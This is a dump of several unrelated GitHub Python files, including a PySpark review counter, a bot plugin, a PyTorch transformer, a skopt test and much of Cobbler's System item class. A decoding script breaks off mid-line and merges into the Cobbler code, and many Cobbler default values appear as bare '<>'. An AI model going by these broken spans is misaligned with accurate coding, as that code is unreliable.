class_dict\n","repo_name":"Mre-Dennis-Kinuthia/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/rectangle.py","file_name":"rectangle.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15470274127","text":"'''from pyspark import SparkContext\nimport sys\n\n#filename=sys.argv[1]\ndef main():\n\tsc=SparkContext(appName='SparkWordCount')\n\tinput_file=sc.textFile('/home/parth/Desktop/Hadoop_Files_py/Musical_instruments_reviews.csv')\n\trecords = input_file.map(parserecord).filter(lambda rec:(rec[1]=='5'))\n\tmapvalues = records.map(lambda rec:((rec[0]),1))\n\treduceout = mapvalues.reduceByKey(lambda a,b: a+b)\n\treduceout.saveAsTextFile('/home/parth/Desktop/spark3.txt')\t\n\tsc.stop()\n\ndef parserecord(line):\n\tfields = line.split(\",\")\n\tr_id = (fields[0])\n\treview = (fields[6])\n\treturn(r_id,review)\n\nif 
__name__=='__main__':\n\tmain()'''\nfrom pyspark import SparkContext\nimport sys\n\ndef main():\n\tsc = SparkContext(appName='SparkWordCount')\n\tinput_file = sc.textFile('/home/parth/Desktop/Hadoop_Files_py/Musical_instruments_reviews.csv')\n\tcounts = input_file.map(lambda line:line.split(',')[0]).map(lambda word:(word,1)).reduceByKey(lambda a,b:a+b)\n\tdef rating(x):\n\t\tl = []\n\t\tif x[1]==5:\n\t\t\tl.append((x[0],x[1]))\n\t\t\treturn l\n\t\telse:\n\t\t\treturn []\n\tcounts = counts.flatMap(lambda x : rating(x))\n\tcounts.saveAsTextFile('/home/parth/Desktop/output2')\n\tsc.stop()\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n#min ax_value = df.agg({\"any-column\": \"max\"}).collect()[0][0]\n#val dsTemp = ds.filter(d => d.temp > 25).map(d => (d.temp, d.device_name, d.cca3)","repo_name":"Parth-Choksi/Demo","sub_path":"sparkprgm/reviewmax5.py","file_name":"reviewmax5.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23130382590","text":"import os\nimport threading\nfrom time import sleep\nfrom threading import Timer\nfrom libs.honorbank import HonorBank\n\nfrom plugin import Plugin\n\n\ndef load(data_dir, bot):\n return Payday(data_dir, bot)\n\n\n\"\"\"\nCreated by Matthew Klawitter 2/1/2018\nLast Updated: 2/1/2018\nVersion: v1.0.0.1\n\"\"\"\n\n\nclass Payday(Plugin):\n def __init__(self, data_dir, bot):\n self.account_manager = HonorBank()\n self.honor_accounts = self.account_manager.honor_accounts\n thread = threading.Thread(target = self.pay_day)\n thread.daemon = True\n thread.start()\n\n def pay_day(self):\n while threading.main_thread().is_alive():\n if self.honor_accounts:\n for account in self.honor_accounts.keys():\n self.account_manager.pay(account, 50)\n self.account_manager.save_accounts()\n sleep(3600)\n","repo_name":"Matthew-Klawitter/Telegram-Response-Bot-KPlugins","sub_path":"plugins/payday.py","file_name":"payday.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"74760566481","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 12 16:07:06 2019\n\n@author: ZHANG Mofan\n\"\"\"\nimport numpy as np\n\ndef meteopreprocessing(data, street_corr):\n data_new = data.copy() \n n_street_added = 0\n for i in range(data.shape[1]):\n for j in range(len(street_corr[i]) - 1):\n data_new = np.insert(data_new, i + 1 + n_street_added, data[:, i], axis = 1)\n n_street_added += 1\n return data_new\n\ndef read_meteo(file_name, shape):\n length = 1\n for l in shape:\n length *= l\n data = np.fromfile(file_name, 'f', length)\n data.shape = shape\n data = data.astype('d')\n return data","repo_name":"BASARANOMO/Tool_meteo_preprocessing","sub_path":"meteopre.py","file_name":"meteopre.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71786166800","text":"import torch\nimport torch.nn as nn\nfrom .decoder import TransformerDecoder\nfrom .encoder import TransformerEncoder\nfrom .embedding import LandmarkEmbedding, TokenEmbedding\n\nclass Transformer(nn.Module):\n def __init__(\n self,\n num_hid=980,\n num_head=2,\n num_feed_forward=128,\n source_maxlen=100,\n target_maxlen=100,\n num_layers_enc=4,\n num_layers_dec=1,\n num_classes=59,\n device=None,\n learning_rate=0.001\n ):\n super(Transformer, self).__init__()\n self.device = device\n self.target_maxlen = 
target_maxlen\n self.num_classes = num_classes\n self.source_emb = LandmarkEmbedding(num_hid, source_maxlen, self.device)\n self.target_emb = TokenEmbedding(num_classes, target_maxlen, num_hid, self.device)\n self.transformer_encoders = nn.ModuleList([\n TransformerEncoder(num_hid, num_head, num_feed_forward, self.device)\n for _ in range(num_layers_enc)\n ])\n self.transformer_decoders = nn.ModuleList([\n TransformerDecoder(num_hid, num_head, num_feed_forward, self.device)\n for _ in range(num_layers_dec)\n ])\n self.classifier = nn.Linear(num_hid, num_classes)\n self.loss_metric = nn.CrossEntropyLoss()\n self.optimizer = torch.optim.Adam(self.parameters(), lr=learning_rate)\n\n def encoder(self, source, mask_source=None):\n enc_out = self.source_emb(source)\n for encoder in self.transformer_encoders:\n enc_out = encoder(enc_out, mask_source=mask_source)\n return enc_out\n\n def decoder(self, enc_out, target, mask_target=None):\n dec_out = self.target_emb(target)\n for decoder in self.transformer_decoders:\n dec_out = decoder(enc_out, dec_out, mask_target=mask_target)\n return dec_out\n\n def forward(self, source, target, mask_source=None, mask_target=None):\n enc_out = self.encoder(source, mask_source=mask_source)\n dec_out = self.decoder(enc_out, target, mask_target=mask_target)\n return self.classifier(dec_out)\n\n def training_step(self, batch):\n \"\"\"Processes one batch inside model.fit().\"\"\"\n landmark_input, phrase_input = batch\n landmark, landmark_mask = landmark_input['inputs_embeds'], landmark_input[\"attention_mask\"]\n phrase, phrase_mask = phrase_input[\"target\"], phrase_input[\"target_mask\"]\n dec_input = phrase[:, :-1]\n dec_target = phrase[:, 1:]\n preds = self(landmark, dec_input, mask_source=None, mask_target=None)\n mask = dec_target != 0\n loss = self.loss_metric(preds.permute(0, 2, 1), dec_target)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n return {\"loss\": loss.item()}\n\n def validation_step(self, batch):\n landmark_input, phrase_input = batch\n landmark, landmark_mask = landmark_input['inputs_embeds'], landmark_input[\"attention_mask\"]\n phrase, phrase_mask = phrase_input[\"target\"], phrase_input[\"target_mask\"]\n\n dec_input = phrase[:, :-1]\n dec_target = phrase[:, 1:]\n preds = self(landmark, dec_input, mask_source=None, mask_target=None)\n mask = dec_target != 0\n loss = self.loss_metric(preds.permute(0, 2, 1), dec_target)\n return {\"loss\": loss.item()}\n\n def inference(self, landmarks, start_token_idx=2):\n enc_out = self.encoder(landmarks)\n bs = landmarks.shape[0] # batch size\n dec_input = torch.ones((bs, 1), dtype=torch.int32, device=self.device) * start_token_idx\n dec_logits = []\n for i in range(self.target_maxlen - 1): # because we already have 1st element\n dec_out = self.decoder(enc_out, dec_input)\n logits = self.classifier(dec_out)\n logits = torch.argmax(logits, dim=-1) # most likely token id at each position\n last_logit = logits[:, -1][:, None]\n dec_logits.append(last_logit)\n dec_input = torch.cat([dec_input, last_logit], dim=-1)\n return dec_input\n","repo_name":"hnm942/torch_asl","sub_path":"models/transformer/als_transformer.py","file_name":"als_transformer.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17010640750","text":"from pathlib import Path\nfrom tempfile import TemporaryDirectory\nimport unittest\n\nfrom sklearn.model_selection import 
KFold\nfrom skopt.space import Categorical, Integer, Real\nimport numpy as np\n\nfrom tests.anomalearn.algorithms.tuning.hyperparameter.stubs.SkoptSearchABCChild import \\\n SkoptSearchABCChild\nfrom tests.anomalearn.algorithms.tuning.hyperparameter.TestHyperparameterSearch import \\\n RandomScoreHolder\n\n\nclass TestSkoptSearchABC(unittest.TestCase):\n @classmethod\n def setUpClass(cls) -> None:\n rng = np.random.default_rng()\n cls.series = rng.random((1000, 5), dtype=np.double)\n cls.labels = rng.integers(0, 1, 1000, dtype=np.intc, endpoint=True)\n cls.rng = rng\n \n def test_search_and_get_results(self):\n with TemporaryDirectory() as tmp_dir:\n scorer = RandomScoreHolder(np.random.default_rng(100), self.series, self.labels, KFold())\n fake_values = [[0, 0, 0], [1, 0, 0], [0, 10, 0], [0.5, 0, 0]]\n \n space = [Integer(0, 100), Categorical([0, 10, 20, 30]), Real(0, 100)]\n tuner = SkoptSearchABCChild(space, Path(tmp_dir), \"test\", fake_values=fake_values)\n \n # tests are inside the stub because it should test that the\n # skopt call is called with the right arguments both in case of\n # loading a previous history and in case of creating a new one\n result = tuner.search(self.series, self.labels, scorer.random_score, skopt_kwargs={\"test\": \"value\", \"tester\": self})\n \n self.assertTrue((Path(tmp_dir) / \"test.pkl\"))\n y0 = [e[0] for e in result.get_history()[1:]]\n\n scorer = RandomScoreHolder(np.random.default_rng(100), self.series, self.labels, KFold())\n tuner = SkoptSearchABCChild(space, Path(tmp_dir), \"test\", fake_values=fake_values, test_loading=True, previous_y=y0)\n _ = tuner.search(self.series, self.labels, scorer.random_score, load_checkpoints=True, skopt_kwargs={\"test\": \"value\", \"tester\": self})\n","repo_name":"marcopetri98/anomalearn","sub_path":"tests/anomalearn/algorithms/tuning/hyperparameter/TestSkoptSearchABC.py","file_name":"TestSkoptSearchABC.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"36438331766","text":"import string\n\ndef un_mix(oneLetter,num):\n\n if(oneLetter.isupper()):\n word = ord(oneLetter)-MIN_CAPLETTER\n shift = ord(num)-MIN_CAPLETTER\n return upperFlag[(word - shift)%len(upperFlag)]\n if(oneLetter.islower()):\n word = ord(oneLetter)-MIN_LETTER\n shift = ord(num)-MIN_LETTER\n return lowerFlag[(word - shift)%len(upperFlag)]\n\n\np = \"ZBTZBHZBIZBSBSEzcawBSEzyzuawac\"\ni = 0\n\nupperFlag = string.ascii_uppercase[:26]\nlowerFlag = string.ascii_lowercase[:26]\nMIN_LETTER = ord(\"a\")\nMIN_CAPLETTER = ord(\"A\")\n\nnumShift = \"t\"\nun_mixed = \"\"\n\nfor count, alpha in enumerate(p):\n un_mixed += un_mix(alpha, numShift)\n\n\nc=\"ACUACIACJACT_gjhd_gfgbhdhj\"\nprint(c)\ni=0\nwhile(i>\", 0, \"Automatic Installation Template\", True, \"Path to automatic installation template\", 0, \"str\"],\n [\"autoinstall_meta\", {}, 0, \"Automatic Installation Template Metadata\", True, \"Ex: dog=fang agent=86\", 0, \"dict\"],\n [\"boot_files\", {}, '<>', \"TFTP Boot Files\", True, \"Files copied into tftpboot beyond the kernel/initrd\", 0, \"list\"],\n [\"boot_loader\", \"<>\", 0, \"Boot loader\", True, \"Linux installation boot loader\", utils.get_supported_system_boot_loaders(), \"str\"],\n [\"comment\", \"\", 0, \"Comment\", True, \"Free form text description\", 0, \"str\"],\n [\"enable_gpxe\", \"<>\", 0, \"Enable gPXE?\", True, \"Use gPXE instead of PXELINUX for advanced booting options\", 0, \"bool\"],\n [\"fetchable_files\", {}, '<>', 
\"Fetchable Files\", True, \"Templates for tftp or wget/curl\", 0, \"dict\"],\n [\"gateway\", \"\", 0, \"Gateway\", True, \"\", 0, \"str\"],\n [\"hostname\", \"\", 0, \"Hostname\", True, \"\", 0, \"str\"],\n [\"image\", None, 0, \"Image\", True, \"Parent image (if not a profile)\", 0, \"str\"],\n [\"ipv6_default_device\", \"\", 0, \"IPv6 Default Device\", True, \"\", 0, \"str\"],\n [\"kernel_options\", {}, 0, \"Kernel Options\", True, \"Ex: selinux=permissive\", 0, \"dict\"],\n [\"kernel_options_post\", {}, 0, \"Kernel Options (Post Install)\", True, \"Ex: clocksource=pit noapic\", 0, \"dict\"],\n [\"mgmt_classes\", \"<>\", 0, \"Management Classes\", True, \"For external config management\", 0, \"list\"],\n [\"mgmt_parameters\", \"<>\", 0, \"Management Parameters\", True, \"Parameters which will be handed to your management application (Must be valid YAML dictionary)\", 0, \"str\"],\n [\"name\", \"\", 0, \"Name\", True, \"Ex: vanhalen.example.org\", 0, \"str\"],\n [\"name_servers\", [], 0, \"Name Servers\", True, \"space delimited\", 0, \"list\"],\n [\"name_servers_search\", [], 0, \"Name Servers Search Path\", True, \"space delimited\", 0, \"list\"],\n [\"netboot_enabled\", True, 0, \"Netboot Enabled\", True, \"PXE (re)install this machine at next boot?\", 0, \"bool\"],\n [\"next_server\", \"<>\", 0, \"Next Server Override\", True, \"See manpage or leave blank\", 0, \"str\"],\n [\"owners\", \"<>\", 0, \"Owners\", True, \"Owners list for authz_ownership (space delimited)\", 0, \"list\"],\n [\"power_address\", \"\", 0, \"Power Management Address\", True, \"Ex: power-device.example.org\", 0, \"str\"],\n [\"power_id\", \"\", 0, \"Power Management ID\", True, \"Usually a plug number or blade name, if power type requires it\", 0, \"str\"],\n [\"power_pass\", \"\", 0, \"Power Management Password\", True, \"\", 0, \"str\"],\n [\"power_type\", \"SETTINGS:power_management_default_type\", 0, \"Power Management Type\", True, \"Power management script to use\", power_manager.get_power_types(), \"str\"],\n [\"power_user\", \"\", 0, \"Power Management Username\", True, \"\", 0, \"str\"],\n [\"profile\", None, 0, \"Profile\", True, \"Parent profile\", [], \"str\"],\n [\"proxy\", \"<>\", 0, \"Internal Proxy\", True, \"Internal proxy URL\", 0, \"str\"],\n [\"server\", \"<>\", 0, \"Server Override\", True, \"See manpage or leave blank\", 0, \"str\"],\n [\"status\", \"production\", 0, \"Status\", True, \"System status\", [\"\", \"development\", \"testing\", \"acceptance\", \"production\"], \"str\"],\n [\"template_files\", {}, 0, \"Template Files\", True, \"File mappings for built-in configuration management\", 0, \"dict\"],\n [\"virt_auto_boot\", \"<>\", 0, \"Virt Auto Boot\", True, \"Auto boot this VM?\", 0, \"bool\"],\n [\"virt_cpus\", \"<>\", 0, \"Virt CPUs\", True, \"\", 0, \"int\"],\n [\"virt_disk_driver\", \"<>\", 0, \"Virt Disk Driver Type\", True, \"The on-disk format for the virtualization disk\", validate.VIRT_DISK_DRIVERS, \"str\"],\n [\"virt_file_size\", \"<>\", 0, \"Virt File Size(GB)\", True, \"\", 0, \"float\"],\n [\"virt_path\", \"<>\", 0, \"Virt Path\", True, \"Ex: /directory or VolGroup00\", 0, \"str\"],\n [\"virt_pxe_boot\", 0, 0, \"Virt PXE Boot\", True, \"Use PXE to build this VM?\", 0, \"bool\"],\n [\"virt_ram\", \"<>\", 0, \"Virt RAM (MB)\", True, \"\", 0, \"int\"],\n [\"virt_type\", \"<>\", 0, \"Virt Type\", True, \"Virtualization technology to use\", validate.VIRT_TYPES, \"str\"],\n [\"serial_device\", \"\", 0, \"Serial Device #\", True, \"Serial Device Number\", 0, \"int\"],\n 
[\"serial_baud_rate\", \"\", 0, \"Serial Baud Rate\", True, \"Serial Baud Rate\", [\"\", \"2400\", \"4800\", \"9600\", \"19200\", \"38400\", \"57600\", \"115200\"], \"int\"],\n]\n\n# network interface fields are in a separate list because a system may contain\n# several network interfaces and thus several values for each one of those fields\n# (1-N cardinality), while it may contain only one value for other fields\n# (1-1 cardinality). This difference requires special handling.\nNETWORK_INTERFACE_FIELDS = [\n [\"bonding_opts\", \"\", 0, \"Bonding Opts\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"bridge_opts\", \"\", 0, \"Bridge Opts\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"cnames\", [], 0, \"CNAMES\", True, \"Cannonical Name Records, should be used with --interface, In quotes, space delimited\", 0, \"list\"],\n [\"connected_mode\", False, 0, \"InfiniBand Connected Mode\", True, \"Should be used with --interface\", 0, \"bool\"],\n [\"dhcp_tag\", \"\", 0, \"DHCP Tag\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"dns_name\", \"\", 0, \"DNS Name\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"if_gateway\", \"\", 0, \"Per-Interface Gateway\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"interface_master\", \"\", 0, \"Master Interface\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"interface_type\", \"na\", 0, \"Interface Type\", True, \"Should be used with --interface\", [\"na\", \"bond\", \"bond_slave\", \"bridge\", \"bridge_slave\", \"bonded_bridge_slave\", \"bmc\", \"infiniband\"], \"str\"],\n [\"ip_address\", \"\", 0, \"IP Address\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_address\", \"\", 0, \"IPv6 Address\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_default_gateway\", \"\", 0, \"IPv6 Default Gateway\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_mtu\", \"\", 0, \"IPv6 MTU\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_prefix\", \"\", 0, \"IPv6 Prefix\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"ipv6_secondaries\", [], 0, \"IPv6 Secondaries\", True, \"Space delimited. Should be used with --interface\", 0, \"list\"],\n [\"ipv6_static_routes\", [], 0, \"IPv6 Static Routes\", True, \"Should be used with --interface\", 0, \"list\"],\n [\"mac_address\", \"\", 0, \"MAC Address\", True, \"(Place \\\"random\\\" in this field for a random MAC Address.)\", 0, \"str\"],\n [\"management\", False, 0, \"Management Interface\", True, \"Is this the management interface? Should be used with --interface\", 0, \"bool\"],\n [\"mtu\", \"\", 0, \"MTU\", True, \"\", 0, \"str\"],\n [\"netmask\", \"\", 0, \"Subnet Mask\", True, \"Should be used with --interface\", 0, \"str\"],\n [\"static\", False, 0, \"Static\", True, \"Is this interface static? 
Should be used with --interface\", 0, \"bool\"],\n [\"static_routes\", [], 0, \"Static Routes\", True, \"Should be used with --interface\", 0, \"list\"],\n [\"virt_bridge\", \"\", 0, \"Virt Bridge\", True, \"Should be used with --interface\", 0, \"str\"],\n]\n\n\nclass System(item.Item):\n \"\"\"\n A Cobbler system object.\n \"\"\"\n\n TYPE_NAME = _(\"system\")\n COLLECTION_TYPE = \"system\"\n\n def __init__(self, *args, **kwargs):\n super(System, self).__init__(*args, **kwargs)\n self.interfaces = dict()\n self.kernel_options = {}\n self.kernel_options_post = {}\n self.autoinstall_meta = {}\n self.fetchable_files = {}\n self.boot_files = {}\n self.template_files = {}\n\n #\n # override some base class methods first (item.Item)\n #\n\n def get_fields(self):\n return FIELDS\n\n def make_clone(self):\n _dict = self.to_dict()\n cloned = System(self.collection_mgr)\n cloned.from_dict(_dict)\n return cloned\n\n def from_dict(self, seed_data):\n # FIXME: most definitely doesn't grok interfaces yet.\n return utils.from_dict_from_fields(self, seed_data, FIELDS)\n\n def get_parent(self):\n \"\"\"\n Return object next highest up the tree.\n \"\"\"\n if (self.parent is None or self.parent == '') and self.profile:\n return self.collection_mgr.profiles().find(name=self.profile)\n elif (self.parent is None or self.parent == '') and self.image:\n return self.collection_mgr.images().find(name=self.image)\n else:\n return self.collection_mgr.systems().find(name=self.parent)\n\n def check_if_valid(self):\n if self.name is None or self.name == \"\":\n raise CX(\"name is required\")\n if self.profile is None or self.profile == \"\":\n if self.image is None or self.image == \"\":\n raise CX(\"Error with system %s - profile or image is required\" % (self.name))\n\n #\n # specific methods for item.System\n #\n\n def __create_interface(self, interface):\n\n self.interfaces[interface] = {}\n for field in NETWORK_INTERFACE_FIELDS:\n self.interfaces[interface][field[0]] = field[1]\n\n def __get_interface(self, name):\n\n if not name:\n raise CX(_(\"No network interface name provided\"))\n if name not in self.interfaces:\n self.__create_interface(name)\n\n return self.interfaces[name]\n\n def delete_interface(self, name):\n \"\"\"\n Used to remove an interface.\n \"\"\"\n if name in self.interfaces and len(self.interfaces) > 1:\n del self.interfaces[name]\n else:\n if name not in self.interfaces:\n # no interface here to delete\n pass\n else:\n raise CX(_(\"At least one interface needs to be defined.\"))\n\n def rename_interface(self, names):\n \"\"\"\n Used to rename an interface.\n \"\"\"\n (name, newname) = names\n if name not in self.interfaces:\n raise CX(_(\"Interface %s does not exist\" % name))\n if newname in self.interfaces:\n raise CX(_(\"Interface %s already exists\" % newname))\n else:\n self.interfaces[newname] = self.interfaces[name]\n del self.interfaces[name]\n\n def set_boot_loader(self, name):\n if name not in utils.get_supported_system_boot_loaders():\n raise CX(_(\"Invalid boot loader name: %s\" % name))\n self.boot_loader = name\n\n def set_server(self, server):\n \"\"\"\n If a system can't reach the boot server at the value configured in settings\n because it doesn't have the same name on it's subnet this is there for an override.\n \"\"\"\n if server is None or server == \"\":\n server = \"<>\"\n self.server = server\n\n def set_next_server(self, server):\n if server is None or server == \"\" or server == \"<>\":\n self.next_server = \"<>\"\n else:\n server = server.strip()\n self.next_server 
= validate.ipv4_address(server)\n\n def set_proxy(self, proxy):\n if proxy is None or proxy == \"\":\n proxy = \"<>\"\n self.proxy = proxy\n\n def get_mac_address(self, interface):\n \"\"\"\n Get the mac address, which may be implicit in the object name or explicit with --mac-address.\n Use the explicit location first.\n \"\"\"\n\n intf = self.__get_interface(interface)\n\n if intf[\"mac_address\"] != \"\":\n return intf[\"mac_address\"].strip()\n else:\n return None\n\n def get_ip_address(self, interface):\n \"\"\"\n Get the IP address for the given interface.\n \"\"\"\n intf = self.__get_interface(interface)\n if intf[\"ip_address\"] != \"\":\n return intf[\"ip_address\"].strip()\n else:\n return \"\"\n\n def is_management_supported(self, cidr_ok=True):\n \"\"\"\n Can only add system PXE records if a MAC or IP address is available, else it's a koan\n only record.\n \"\"\"\n if self.name == \"default\":\n return True\n for (name, x) in self.interfaces.items():\n mac = x.get(\"mac_address\", None)\n ip = x.get(\"ip_address\", None)\n if ip is not None and not cidr_ok and ip.find(\"/\") != -1:\n # ip is in CIDR notation\n return False\n if mac is not None or ip is not None:\n # has ip and/or mac\n return True\n return False\n\n def set_dhcp_tag(self, dhcp_tag, interface):\n intf = self.__get_interface(interface)\n intf[\"dhcp_tag\"] = dhcp_tag\n\n def set_cnames(self, cnames, interface):\n intf = self.__get_interface(interface)\n data = utils.input_string_or_list(cnames)\n intf[\"cnames\"] = data\n\n def set_static_routes(self, routes, interface):\n intf = self.__get_interface(interface)\n data = utils.input_string_or_list(routes)\n intf[\"static_routes\"] = data\n\n def set_status(self, status):\n self.status = status\n\n def set_static(self, truthiness, interface):\n intf = self.__get_interface(interface)\n intf[\"static\"] = utils.input_boolean(truthiness)\n\n def set_management(self, truthiness, interface):\n intf = self.__get_interface(interface)\n intf[\"management\"] = utils.input_boolean(truthiness)\n\n# ---\n\n def set_dns_name(self, dns_name, interface):\n \"\"\"\n Set DNS name for interface.\n\n @param: str dns_name (dns name)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n dns_name = validate.hostname(dns_name)\n if dns_name != \"\" and utils.input_boolean(self.collection_mgr._settings.allow_duplicate_hostnames) is False:\n matched = self.collection_mgr.api.find_items(\"system\", {\"dns_name\": dns_name})\n for x in matched:\n if x.name != self.name:\n raise CX(\"DNS name duplicated: %s\" % dns_name)\n\n intf = self.__get_interface(interface)\n intf[\"dns_name\"] = dns_name\n\n def set_hostname(self, hostname):\n \"\"\"\n Set hostname.\n\n @param: str hostname (hostname for system)\n @returns: True or CX\n \"\"\"\n self.hostname = validate.hostname(hostname)\n\n def set_ip_address(self, address, interface):\n \"\"\"\n Set IPv4 address on interface.\n\n @param: str address (ip address)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n address = validate.ipv4_address(address)\n if address != \"\" and utils.input_boolean(self.collection_mgr._settings.allow_duplicate_ips) is False:\n matched = self.collection_mgr.api.find_items(\"system\", {\"ip_address\": address})\n for x in matched:\n if x.name != self.name:\n raise CX(\"IP address duplicated: %s\" % address)\n\n intf = self.__get_interface(interface)\n intf[\"ip_address\"] = address\n\n def set_mac_address(self, address, interface):\n \"\"\"\n Set mac address on 
interface.\n\n @param: str address (mac address)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n address = validate.mac_address(address)\n if address == \"random\":\n address = utils.get_random_mac(self.collection_mgr.api)\n if address != \"\" and utils.input_boolean(self.collection_mgr._settings.allow_duplicate_macs) is False:\n matched = self.collection_mgr.api.find_items(\"system\", {\"mac_address\": address})\n for x in matched:\n if x.name != self.name:\n raise CX(\"MAC address duplicated: %s\" % address)\n\n intf = self.__get_interface(interface)\n intf[\"mac_address\"] = address\n\n def set_gateway(self, gateway):\n \"\"\"\n Set a gateway IPv4 address.\n\n @param: str gateway (ip address)\n @returns: True or CX\n \"\"\"\n self.gateway = validate.ipv4_address(gateway)\n\n def set_name_servers(self, data):\n \"\"\"\n Set the DNS servers.\n\n @param: str/list data (string or list of nameservers)\n @returns: True or CX\n \"\"\"\n self.name_servers = validate.name_servers(data)\n\n def set_name_servers_search(self, data):\n \"\"\"\n Set the DNS search paths.\n\n @param: str/list data (string or list of search domains)\n @returns: True or CX\n \"\"\"\n self.name_servers_search = validate.name_servers_search(data)\n\n def set_netmask(self, netmask, interface):\n \"\"\"\n Set the netmask for given interface.\n\n @param: str netmask (netmask)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n intf = self.__get_interface(interface)\n intf[\"netmask\"] = validate.ipv4_netmask(netmask)\n\n def set_if_gateway(self, gateway, interface):\n \"\"\"\n Set the per-interface gateway.\n\n @param: str gateway (ipv4 address for the gateway)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n intf = self.__get_interface(interface)\n intf[\"if_gateway\"] = validate.ipv4_address(gateway)\n\n# --\n\n def set_virt_bridge(self, bridge, interface):\n if bridge == \"\":\n bridge = self.settings.default_virt_bridge\n intf = self.__get_interface(interface)\n intf[\"virt_bridge\"] = bridge\n\n def set_interface_type(self, type, interface):\n interface_types = [\"bridge\", \"bridge_slave\", \"bond\", \"bond_slave\", \"bonded_bridge_slave\", \"bmc\", \"na\", \"infiniband\", \"\"]\n if type not in interface_types:\n raise CX(_(\"interface type value must be one of: %s or blank\" % \",\".join(interface_types)))\n if type == \"na\":\n type = \"\"\n intf = self.__get_interface(interface)\n intf[\"interface_type\"] = type\n\n def set_interface_master(self, interface_master, interface):\n intf = self.__get_interface(interface)\n intf[\"interface_master\"] = interface_master\n\n def set_bonding_opts(self, bonding_opts, interface):\n intf = self.__get_interface(interface)\n intf[\"bonding_opts\"] = bonding_opts\n\n def set_bridge_opts(self, bridge_opts, interface):\n intf = self.__get_interface(interface)\n intf[\"bridge_opts\"] = bridge_opts\n\n def set_ipv6_autoconfiguration(self, truthiness):\n self.ipv6_autoconfiguration = utils.input_boolean(truthiness)\n\n def set_ipv6_default_device(self, interface_name):\n if interface_name is None:\n interface_name = \"\"\n self.ipv6_default_device = interface_name\n\n def set_ipv6_address(self, address, interface):\n \"\"\"\n Set IPv6 address on interface.\n\n @param: str address (ip address)\n @param: str interface (interface name)\n @returns: True or CX\n \"\"\"\n address = validate.ipv6_address(address)\n if address != \"\" and utils.input_boolean(self.collection_mgr._settings.allow_duplicate_ips) is 
False:\n            matched = self.collection_mgr.api.find_items(\"system\", {\"ipv6_address\": address})\n            for x in matched:\n                if x.name != self.name:\n                    raise CX(\"IPv6 address duplicated: %s\" % address)\n\n        intf = self.__get_interface(interface)\n        intf[\"ipv6_address\"] = address\n\n    def set_ipv6_prefix(self, prefix, interface):\n        \"\"\"\n        Assign an IPv6 prefix\n        \"\"\"\n        intf = self.__get_interface(interface)\n        intf[\"ipv6_prefix\"] = prefix.strip()\n\n    def set_ipv6_secondaries(self, addresses, interface):\n        intf = self.__get_interface(interface)\n        data = utils.input_string_or_list(addresses)\n        secondaries = []\n        for address in data:\n            if address == \"\" or utils.is_ip(address):\n                secondaries.append(address)\n            else:\n                raise CX(_(\"invalid format for IPv6 IP address (%s)\") % address)\n\n        intf[\"ipv6_secondaries\"] = secondaries\n\n    def set_ipv6_default_gateway(self, address, interface):\n        intf = self.__get_interface(interface)\n        if address == \"\" or utils.is_ip(address):\n            intf[\"ipv6_default_gateway\"] = address.strip()\n            return\n        raise CX(_(\"invalid format for IPv6 IP address (%s)\") % address)\n\n    def set_ipv6_static_routes(self, routes, interface):\n        intf = self.__get_interface(interface)\n        data = utils.input_string_or_list(routes)\n        intf[\"ipv6_static_routes\"] = data\n\n    def set_ipv6_mtu(self, mtu, interface):\n        intf = self.__get_interface(interface)\n        intf[\"ipv6_mtu\"] = mtu\n\n    def set_mtu(self, mtu, interface):\n        intf = self.__get_interface(interface)\n        intf[\"mtu\"] = mtu\n\n    def set_connected_mode(self, truthiness, interface):\n        intf = self.__get_interface(interface)\n        intf[\"connected_mode\"] = utils.input_boolean(truthiness)\n\n    def set_enable_gpxe(self, enable_gpxe):\n        \"\"\"\n        Sets whether or not the system will use gPXE for booting.\n        \"\"\"\n        self.enable_gpxe = utils.input_boolean(enable_gpxe)\n\n    def set_profile(self, profile_name):\n        \"\"\"\n        Set the system to use a certain named profile. The profile\n        must have already been loaded into the Profiles collection.\n        \"\"\"\n        old_parent = self.get_parent()\n        if profile_name in [\"delete\", \"None\", \"~\", \"\"] or profile_name is None:\n            self.profile = \"\"\n            if isinstance(old_parent, item.Item):\n                old_parent.children.pop(self.name, 'pass')\n            return\n\n        self.image = \"\"  # mutual exclusion rule\n\n        p = self.collection_mgr.profiles().find(name=profile_name)\n        if p is not None:\n            self.profile = profile_name\n            self.depth = p.depth + 1  # subprofiles have varying depths.\n            if isinstance(old_parent, item.Item):\n                old_parent.children.pop(self.name, 'pass')\n            new_parent = self.get_parent()\n            if isinstance(new_parent, item.Item):\n                new_parent.children[self.name] = self\n            return\n        raise CX(_(\"invalid profile name: 